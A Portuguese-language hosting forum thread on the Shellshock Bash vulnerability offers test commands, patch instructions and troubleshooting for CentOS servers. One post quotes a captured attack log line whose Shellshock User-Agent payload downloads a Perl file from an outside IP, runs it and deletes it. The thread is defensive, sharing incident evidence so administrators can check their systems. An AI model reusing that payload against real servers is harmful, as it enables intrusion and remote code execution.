Jump to content

Proteja seus servidores contra o Shellshock/Bashbug agora


AngelCosta

Recommended Posts

  • Administration

Um bug encontrado na interface de comandos Bash pode comprometer a segurança de servidores e sistemas baseados em Linux e Unix e deixá-los vulneráveis a ataques. O problema, chamado de Shellshock, é considerado severo e comparado ao Heartbleed, pior falha já detectada na Internet.

Uma maneira de detectar se o seu sistema está comprometido é acessar o servidor e digitar:

env VAR='() { :;};echo Bash com problemas!' bash -c "echo Bash OK"

Se o resultado for apenas Bash OK, você está livre deste risco.

Já, se o resultado for Bash com problemas, a melhor solução é atualizar o seu sistema:

Debian & Ubuntu:

sudo apt-get update && sudo apt-get install --only-upgrade bash

Centos, Fedora & Red Hat:

sudo yum update bash

Para mais detalhes: CVE-2014-6271 e CVE-2014-7169.

Sugestão de correção vinda do blog da Digital Ocean.



Leia a notícia no blog do Portal do Host

'Cause he's my best friend, he's my pal. He's my homeboy, my rotten soldier. He's my sweet cheese. My good-time boy.

Link to comment
Share on other sites

 

Um bug encontrado na interface de comandos Bash pode comprometer a segurança de servidores e sistemas baseados em Linux e Unix e deixá-los vulneráveis a ataques. O problema, chamado de Shellshock, é considerado severo e comparado ao Heartbleed, pior falha já detectada na Internet.

Uma maneira de detectar se o seu sistema está comprometido é acessar o servidor e digitar:

env VAR='() { :;};echo Bash com problemas!' bash -c "echo Bash OK"

Se o resultado for apenas Bash OK, você está livre deste risco.

Já, se o resultado for Bash com problemas, a melhor solução é atualizar o seu sistema:

Debian & Ubuntu:
sudo apt-get update && sudo apt-get install --only-upgrade bash
Centos, Fedora & Red Hat:
sudo yum update bash

Para mais detalhes: CVE-2014-6271 e CVE-2014-7169.

Sugestão de correção vinda do blog da Digital Ocean.

Leia a notícia no blog do Portal do Host

 

Muito bom! aqui parece estar tudo ok.  ^_^

Link to comment
Share on other sites

  • Administration

Calma, em alguns dias terá que realizar uma nova atualização, esta não é uma 'solução' final.

 

Isso mesmo, isto e apenas uma soluçao paliativa ate a resoluçao do problema sair.

'Cause he's my best friend, he's my pal. He's my homeboy, my rotten soldier. He's my sweet cheese. My good-time boy.

Link to comment
Share on other sites

Estou com um servidor com Centos 5.10 (Final) e com a versão do bash 3.2-32.el5_9.1 (após yum). Outros 2 servidores com a mesma versão centos está tudo Ok, porém como estes são 64Bits foi instalada outra versão do bash.

 

Após atualização via YUM, efetuo um novo teste fornecido pela RedHat: https://access.redhat.com/articles/1200223

env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"

Mas o servidor ainda retorna:

vulnerable
bash: BASH_FUNC_x(): line 0: syntax error near unexpected token `)'
bash: BASH_FUNC_x(): line 0: `BASH_FUNC_x() () { :;}; echo vulnerable'
bash: error importing function definition for `BASH_FUNC_x'
test

Este servidor inclusive possui atualizações automáticas via Ksplice Uptrack, mesmo assim nada.

 

Alguém encontrou o mesmo problema?

 

ATUALIZAÇÃO! Solicitei ao DC uma ajuda na atualização para a versão 3.2-33.el5_10.4 já que pelo YUM esta versão na aparecia nem rezando. Após efetuarem a atualização para a versão 3.2-33.el5_10.4 problema resolvido:

 

Depois da atualização:

# env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `BASH_FUNC_x'
test
# cd /tmp; rm -f /tmp/echo; env 'x=() { (a)=>\' bash -c "echo date"; cat /tmp/echo
date
cat: /tmp/echo: No such file or directory

Descobri também em um outro servidor (não produção/testes) como eles estão fazendo para inserir o arquivo no ataque:

 

Exemplo no servidor explorado:

173.45.100.18 - - [27/Sep/2014:14:27:14 -0300] "GET /cgi-bin/hi HTTP/1.0" 302 205 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

Observem que o arquivo 'jurat' foi inserido no diretório 'tmp'. Tenho inclusive uma cópia do mesmo para análise que copiei antes de remover.

 

O exploit ficou rodando via '/usr/sbin/atd', o que levou a carga nas alturas.

 

Não vou postar o conteúdo do exploit aqui para evitar que engraçadinhos o utilizem, mas se todos acharem que é necessário posto aqui sem problema.

 

Isto leva a crer que tem muita gente sendo explorado sem saber, por isto verifiquem seus diretórios temporários, principalmente a procura de nomes de arquivos como jurat, jurat.1, jurat2., etc...

 

Observação: O que estou achando estranho no exploit é que alguns trechos estão em português, parecendo que foi criado ou adaptado por algum Brasileiro. Exemplo de alguns trechos em português: porta, versao, servidor, etc...

Link to comment
Share on other sites

Essa falha vai durar alguns anos pra ser totalmente corrigida (experiência profissional), não vão pensando que só atualizando o sistema vão ficar protegidos, fiquem de olho nos logs, tenham um fail2ban bem configurado pra dropar quem tenta explorar a falha.

 

Lembrando que o primeiro a reportar sobre essa falha fui eu, na mesma sessão: 

 

Para 0day não existe patch.

Link to comment
Share on other sites

  • Administration

Essa falha vai durar alguns anos pra ser totalmente corrigida (experiência profissional), não vão pensando que só atualizando o sistema vão ficar protegidos, fiquem de olho nos logs, tenham um fail2ban bem configurado pra dropar quem tenta explorar a falha.

 

Lembrando que o primeiro a reportar sobre essa falha fui eu, na mesma sessão: 

 

Para 0day não existe patch.

 

Vc tem duas contas no forum Mateus?

'Cause he's my best friend, he's my pal. He's my homeboy, my rotten soldier. He's my sweet cheese. My good-time boy.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...

Important Information

Do you agree with our terms?